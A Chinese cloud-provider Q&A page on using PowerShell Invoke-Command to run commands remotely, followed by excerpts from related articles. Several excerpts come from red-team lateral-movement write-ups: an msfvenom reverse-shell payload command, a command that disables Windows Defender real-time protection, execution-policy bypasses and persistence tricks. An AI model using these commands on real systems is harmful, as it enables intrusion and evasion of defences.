Powershell:使用带自定义功能的invoke-command在远程计算机上执行，并在主机上显示输出

Powershell是一种用于管理和自动化Windows操作系统的脚本语言和命令行工具。它具有强大的功能，可以通过远程执行命令来管理远程计算机，并在主机上显示输出。

使用带自定义功能的invoke-command在远程计算机上执行命令，可以实现在远程计算机上执行自定义的脚本块或命令，并将结果返回到主机上显示。这对于批量管理远程计算机非常有用。

以下是使用Powershell的invoke-command命令在远程计算机上执行命令，并在主机上显示输出的示例：

首先，确保你的计算机上已经安装了Powershell。
打开Powershell控制台。
使用以下命令连接到远程计算机并执行命令：

Invoke-Command -ComputerName 远程计算机名 -ScriptBlock { 远程计算机上要执行的命令 }

例如，如果要在远程计算机上执行ipconfig命令，并在主机上显示输出，可以使用以下命令：

Invoke-Command -ComputerName 远程计算机名 -ScriptBlock { ipconfig }

执行命令后，Powershell将连接到远程计算机，并在主机上显示ipconfig命令的输出结果。

需要注意的是，远程计算机必须具有启用了远程管理功能的Powershell，并且你必须具有足够的权限来连接和执行命令。

推荐的腾讯云相关产品：腾讯云云服务器（CVM）和腾讯云弹性容器实例（Elastic Container Instance）。这些产品提供了强大的计算能力和灵活的部署方式，可以满足远程计算和管理的需求。

腾讯云云服务器（CVM）产品介绍链接地址：https://cloud.tencent.com/product/cvm

腾讯云弹性容器实例（Elastic Container Instance）产品介绍链接地址：https://cloud.tencent.com/product/eci

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

Windows: 使用PowerShell管理Hyper-V虚拟机

在Windows上，PowerShell是一个功能强大的命令行工具，可以用来管理Hyper-V虚拟机。...在虚拟机上运行命令。你应该会看到作为 PowerShell 提示符前缀的 VMName 显示如下： [VMName]: PS C:> 所有运行的命令将会在虚拟机上进行。...使用 Invoke-Command 运行脚本或命令配合使用 PowerShell Direct 和 Invoke-Command 非常适合需要在虚拟机上运行一个命令或一个脚本但在这一点之外无需继续与虚拟机进行交互的情况...该命令将在虚拟机上执行，如果存在到控制台的输出，会把此输出打印到控制台。命令一运行将会自动关闭连接。...使用 New-PSSession 和 Copy-Item 复制文件注意： PowerShell Direct 仅支持 Windows 版本 14280 及更高版本中的持久性会话在编写用于跨一个或多个远程计算机协调操作的脚本时

3341 0

如何使用Ketshash检测可疑的特权NTLM连接

该工具可以基于下列信息来实现其功能： 1、受监控计算机上的安全事件日志（登录事件）； 2、活动目录中的身份验证事件；工具要求该工具的使用要求用户账号拥有下列权限： 1、访问远程计算机的安全事件日志...； 2、活动目录的读取权限（标准域账户）； 3、计算机在同一时间同步，否则会影响结果； 4、至少安装并配置好PowerShell 2.0；工具下载该工具是一个PowerShell脚本，因此我们只能在支持...PowerShell 2.0+的设备上使用该工具。...，因此不太可能对主功能脚本块进行调试。...但是我们可以在Detect-PTHMultithreaded之前使用Invoke-Command调试： Invoke-Command -ScriptBlock $detectPTHScriptBlock

8475 0

内网渗透｜利用 WinRM 进行横向渗透

-20210804172824608 如上图所示，成功在远程主机上执行命令。...使用 winrm 命令我们也可以直接通过 winrm 命令执行远程主机上的程序，通常是木马程序，这里我们尝试执行启动一个计算器： winrm invoke create wmicimv2/win32_...calc 进程： image-20210804214037070 使用 Invoke-Command 命令 Invoke-Command 是 PowerShell 上的一个命令，用来在本地或远程计算机上执行命令...•-Credential：指定有权连接到远程计算机的用户的帐户。•-Command：指定需要执行的命令。 image-20210804215420172 如上图所示，成功在远程主机上执行命令。...在会话期间，您键入的命令在远程计算机上运行，就像您直接在远程计算机上键入一样。

5.1K4 0

ATT&CK视角下的红蓝对抗:十八.横向移动之利用WinRM进行横向渗透

切换到跳板机，在没有加入域控的情况下，使用WinRS命令需先将靶标机器的IP加入客户端信任列表，在cmd和powershell下都可以使用命令将靶标机器的IP加入客户端信任列表中，如图1-2所示。...2.Invoke-Command Invoke-Command是一个 PowerShell命令，该命令可用于在远程机器上运行脚本或其他命令，并且可以同时在多台机器上运行命令。...Invoke-Command使用WinRM服务在远程计算机上执行命令。要使用 Invoke-Command则必须在远程机器上具有适当的权限，并且WinRM服务必须在远程计算机上运行。...首先，在攻击机上执行命令msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.10.2 lport=1342 -f exe > invoke.exe...接下来在跳板机中使用Powershell运行Invoke-Command命令，输入Invoke-Command -ComputerName 192.168.1.3 -Credential administrator

4706 0

Powershell进阶学习(3) Po

5232 0

如何在网络中追踪入侵者（三）：主机追踪

这些技术首先会帮你发现主机上恶意行为的一些线索——不管你有没有签名或者IOC。你可以自由的使用这些，同时感受追踪的强大功能。搜索指标一个通用的起始点是在你的主机上搜索IOC。...这个特殊的签名其实是 Mimikatz工具的作者编写的。 ? 你可以在本地运行Yara，但是如果在远程或者多台机器上运行功能会更强大。Powershell能够让操作更方便。...利用Powershell运行Yara可以通过下面这几个简单的步骤，假设你已经有登录凭证并且 Powershell已经远程开放了。...我们推荐结合Powershell 和autoruns的命令行来使用，这样可以远程从你的系统抓取数据。...下一个例子展示了一个程序在启动的时候从回收站执行，只有单字符的文件名，很清楚的显示一些奇怪的东西在执行。 ? 这里你不仅仅可以从自动运行数据获取可疑的信息。还有很多方法。

1.2K9 0

渗透技巧 | Bypass Powershell执行策略的N种方式

•要求所有脚本和配置文件都由受信任的发布者签名，包括在本地计算机上编写的脚本。...•需要可信发布者对从 Internet 下载的脚本和配置文件（包括电子邮件和即时消息程序）进行数字签名。•不要求在本地计算机上编写的脚本（不是从 Internet 下载的）具有数字签名。...微软对他的一句话说明为：为 Windows 计算机设置 PowerShell 执行策略。...0x04 使用Invoke-Command或Invoke-Expression命令 Invoke-Command 通过交互式PowerShell控制台执行。...此外，这个命令还有一个比较夸张的功能：可以抓取远程主机的策略并应用到当前主机。这里测试了一下工作组。

4K2 0

如何在远程系统执行程序

序言在我们获得用户名口令后，尝试远程登陆目标主机并执行程序，结合实际环境做了如下测试....条件：启动Task Scheduler服务 2、psexec PsTools工具之一，在指定的一台或多台计算机上运行应用程序条件：需要开放ADMIN$共享 3、WMIC 功能强大，可做系统管理、远程主机信息获取...条件：启动WMI服务，开放135端口本地安全策略的“网络访问: 本地账户的共享和安全模式”应设为“经典-本地用户以自己的身份验证” 4、wmiexec 使用VBS脚本调用WMI来模拟psexec的功能...条件：启动WMI服务，开放135端口本地安全策略的“网络访问: 本地账户的共享和安全模式”应设为“经典-本地用户以自己的身份验证” 5、powershell remoting 实现在目标主机远程执行程序后...终于在GitHub上面找到了一个smbexec的c++参考资料，作为工具改进模版模版下载地址： https://github.com/sunorr/smbexec 总结这篇文章共列举了六种远程执行程序的方法

1.6K2 0

横向移动之WinRM横向移动

-a[llow]d[elegate] - 指定可以将用户凭据用于访问远程共享，例如，不是目标终结点所在的计算机上创建的远程共享。...远程计算机上的旧安装可能不支持压缩，因此默认情况下处于禁用状态。 -[use]ssl - 在使用远程终结点时使用 SSL 连接。...下面是在powershell上面执行查看WINRM的一些命令 # Enable PowerShell Remoting on the target (box needs to be compromised...作者这里提供了5中不同的执行方式。 ? 当然可以在cobaltstrike加载powershell来进行WSManWinRM横向移动，WSManWinRM.ps1用法如下。...翻了翻cobaltstrike的源码，找到了winrm的执行方式，他这里是通过powershell来执行命令的，通过 Invoke-Command 指定-ScriptBlock来执行命令。 ?

4.4K1 0

CS学习笔记 | 16、用户枚举三个关键步骤

列出域管理员对于发现域管理员账号，可以在共享里使用本地的Windows命令。运行以下两条命令可以用来找出这些“域群组”的成员。...Administrator TEAMSSIX\Daniel TEAMSSIX\Enterprise Admins TEAMSSIX\Domain Admins PowerView 模块 PowerView 使用下面的命令能够在一个主机上找到本地管理员...WinRM 运行命令 WinRM 运行在 5985 端口上，WinRM 是 Windows 远程管服务，使用 WinRM 可以使远程管理更容易一些。...命令运行后的结果，WinRM 也将通过命令行进行显示，因此可以使用 Powershell 的 Invoke 命令来作为远程工具，而不使用其他的恶意软件来控制系统。...文件大小在 2 MB 多，因此直接运行powershell-import导入该文件会报错，这里可以选择使用 beacon 中的 upload 命令或者在当前会话的 File Browser 图形界面中上传该文件

6754 0

Ansible 客户端需求–设置Windows主机

没有安装此修补程序，Ansible将无法在Windows主机上执行某些命令。这些修补程序应作为系统引导或映像过程的一部分进行安装。...默认情况下为空；WinRM服务启动时会生成一个自签名证书，并在TLS进程中使用该证书。 Winrs\MaxShellRunTime：这是允许远程命令执行的最长时间（以毫秒为单位）。...一些要检查的东西：确保WinRM服务已启动并在主机上运行。使用来获取服务的状态。(Get-Service -Name winrm).Status 检查主机防火墙是否允许通过WinRM端口的通信。...警告使用此功能需要您自担风险！在Windows上使用SSH是试验性的，该实现可能会在功能版本中进行向后不兼容的更改。服务器端组件可能不可靠，具体取决于所安装的版本。...当将SSH密钥身份验证与Ansible结合使用时，远程会话将无权访问用户的凭据，并且在尝试访问网络资源时将失败。这也称为双跳或凭据委派问题。

10.1K4 1

黑客(红队)攻防中内网环境下WMI的利用

通过这个模型，我们可以方便地从远程计算机获取管理数据，也就是说，你可以在自己的电脑上查看和管理其他电脑的信息。...wmic nicconfig get macaddress, ipaddress //获取网络适配器的MAC地址和IP地址WMIC远程获取shell 而前面也说了WMIC还有远程管理文件和操作计算机的功能...call create "cmd.exe"是要连接的远程计算机的名称或IP地址,是要使用的用户名，是对应的密码.这段命令的作用就是远程连接到...，理解WMIC命令后也是很简单，例如：wmic /node:目标IP地址 /user:用户名密码 /output:输出文件路径 systeminfo > 输出文件路径 //获取远程计算机的系统信息...wmic /node:目标IP地址 /user:用户名密码 process get ProcessId,ProcessName,CommandLine > 输出文件路径 //获取远程计算机的进程信息

2070 0

如何使用ADLab搭建活动目录实验环境来练习渗透测试技术

关于ADLab PowerShell模块 ADLab是一个功能强大的PowerShell模块，该工具可以自动化实现一个活动目录实验环境，以帮助广大研究人员更好地学习和研究内部网络环境内的渗透测试技术。...\ADLab.psm1 初始化实验环境 Invoke-DCPrep 这个功能函数用于准备当前的虚拟机或计算机设备，并将其当作一个域控制器来使用。...使用默认配置运行当前虚拟机，并显示Verbose输出： Invoke-DCPrep -Verbose 设置自定义主机名并使用Google DNS作为外网访问： Invoke-DCPrep -Hostname..."DC" -NewIPv4DNSServer "8.8.8.8" 使用自定义IP和默认网关，并显示Verbose输出： Invoke-DCPrep -Verbose -NewIPv4Address "...-Verbose Invoke-DNSDeploy 该功能从安装DNS功能开始，然后添加主区域并配置服务器转发器。

1K2 0

T1028: WinRM for Lateral Movement

-ScriptBlock { Command } #computername 可接受多个参数，即可同时在多个目标上远程执行。...注意有3次Logon 4648事件可以注意到4648事件（使用显示凭据登录产生该事件)，显示了启动的进程、连接的主机名和使用的账户。...其中的一部分日志显示创建了一个shell： ? ? 在OWA2010SP3上查看日志： ?...Invoke-Command -Credential $cred -ScriptBlock {Hostname} #在远程主机上执行命令 Enter-PSSession -.../June Windows Remote Management PowerShell 远程执行任务一条命令实现端口复用后门 WinRM 结合HTTP.sys驱动实现端口复用 ?

2K3 0

windows: 通过普通域用户凭据远程修改其他用户密码

本文将介绍一个独特的PowerShell脚本解决方案，该方案通过普通用户凭据远程登录服务器，并成功修改了其他用户的密码。 1....为实现此目的，我们设计了一个PowerShell脚本，该脚本能够通过普通用户的凭据远程登录服务器，并修改其他用户的密码。 2....通过Invoke-Command cmdlet，脚本远程连接到指定的服务器，并在ScriptBlock中执行密码修改操作。...NewPassword -OldPassword $OldPassword -Credential $credentials -WhatIf -Confirm } 2.3 密码验证密码修改后，脚本尝试使用新密码远程连接到服务器并执行一个简单的...结论这个独特的PowerShell脚本方案展示了如何通过普通用户的凭据远程修改其他用户的密码。虽然这不是常见的做法，但在特定的场景下可能非常有用。

6834 0

红队技巧-持久性技巧

但是最后还是会有个cmd框，难受，但是没显示出执行的命令，还是有点优化效果的！ 2....它是一个在PowerShell启动时运行的脚本，你可以使用配置文件作为登录脚本来自定义环境，你可以添加命令，功能，别名，模块等。...PowerShell配置文件脚本存储在文件夹“ WindowsPowerShel”中，默认情况下对用户隐藏。如果有效负载已放入磁盘，则可以使用。...执行过程不会像上面的示例那样在系统上创建新进程，而是使用现有的PowerShell进程，更为隐蔽。...cmdlet“ Invoke-Command ”的用法中允许执行命令，所以regsvr32方法可以用作隐藏选项，因为它可以规避未正确配置的应用程序白名单解决方案，并且可以从远程执行scriptlet。

1.2K3 0

从Linux到Windows的PowerShell远程处理

背景资料偶然发现在我的测试中使用PowerShell远程处理作为维护系统远程代码执行的主要方法很有用。它是一个内置的Windows功能。...PowerShell远程处理需要对Kerberos身份验证，这意味着客户端计算机和目标计算机必须都连接到同一域。如果我们没有可以连接的机器来执行远程处理，那么这对测试人员来说可能会造成问题。...这是在Enter-PSSession设置阶段使用NTLM身份验证所必需的，这是唯一可用于通过PowerShell远程连接从Linux连接到Windows的身份验证机制。.../powershell-ntlm 6.现在我们一直在等待：使用以下命令进入远程PowerShell会话 - 请注意，您必须指定-Authentication类型： # Grab the creds we...Invoke-Command功能 Invoke-Command -ComputerName 10.20.30.190 -Authentication Negotiate -Credential $creds

2.1K2 0

红队技巧-常规横向手法

而wmiexec是模拟psexec功能的vbs脚本执行原理： 1.WMI通过账号密码或者NTLM认证（WCE注入）连接到远程计算机。...，通过它可以访问、配置、管理和监视几乎所有的Windows资源，比如用户可以在远程计算机器上启动一个进程；设定一个在特WMI允许脚本语言（例如VBScript或Windows PowerShell）在本地和远程管理...)（组件对象模型）的扩展，它允许应用程序实例化和访问远程计算机上COM对象的属性和方法，就像使用基于DCERPC的DCOM协议在本地计算机上的对象一样，有关每个COM（和DCOM）对象的标识，实现和配置的信息存储在注册表中...在powershell中我们可以使用 get-CimInstance来列出本地COM程序列表远程DCOM对象的实例表现如下：客户端计算机从远程计算机请求实例化由CLSID表示的对象。...6.Outlook 在Outlook对象允许实例化和任意COM相互作用通过“创建对象”对象方法。这使攻击者可以与远程计算机上的COM对象进行交互，这些对象通常不会由DCOM公开。

2.1K2 0

PS命令之操作系统远程管理及进程服务操作示例

-Force # 在计算机位于公用网络上时在Windows客户端版本上启用PowerShell远程处理 # 在此计算机上设置了 WinRM 以接收请求。...该cmdlet阻止对本地计算机上所有PowerShell版本和更高会话会话配置的远程访问,同样需要使用“以管理员身份运行” 选项启动。...# 新的输出显示AccessDenied安全描述符已从所有会话配置中删除,此时便可以正常的创建远程连接会话了。...For 参数 : 指定PowerShell可以在远程计算机上运行命令。 Timeout 参数 : 指定五分钟的等待时间。 Delay 参数 : 每两秒钟查询一次远程计算机，以确定它是否重新启动。...Start-Process 命令 - 启动在本地计算机或远程计算机未运行进程 Stop-Process 命令 - 停止在本地计算机或远程计算机上运行的进程 Wait-Process 命令 - 使在本地计算机或远程计算机上运行的进程等待

7.3K4 0

四十二.Powershell恶意代码检测系列 (3)PowerSploit脚本渗透详解

一旦攻击者可以在一台计算机上运行代码，就会下载PowerShell脚本文件（.ps1）到磁盘中执行，甚至无须写到磁盘中执行，它就可以直接在内存中运行。...各Windows操作系统的PowerShell版本如下：一旦攻击者在一台计算机上运行代码，他们就会下载PowerShell脚本文件（.ps1）到磁盘中执行，甚至无须写道磁盘中执行，就可以直接在内存中运行...第一个命令如下： Get-Host 输出结果如下图所示：另一个命令是： $psversiontable 同时，Powershell可以获取计算机的服务详细信息、状态等。...powershell Set-MpPreference -disablerealtimeMonitoring $true 在CMD窗口下执行，将远程主机上的test.exe下载到本地。...PowerSploit各个模块的功能包括： AntivirusBypass：发现杀毒软件的查杀特征 CodeExecution：在目标主机上执行代码 Exfiltration：目标主机上的信息搜集工具

3.2K3 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云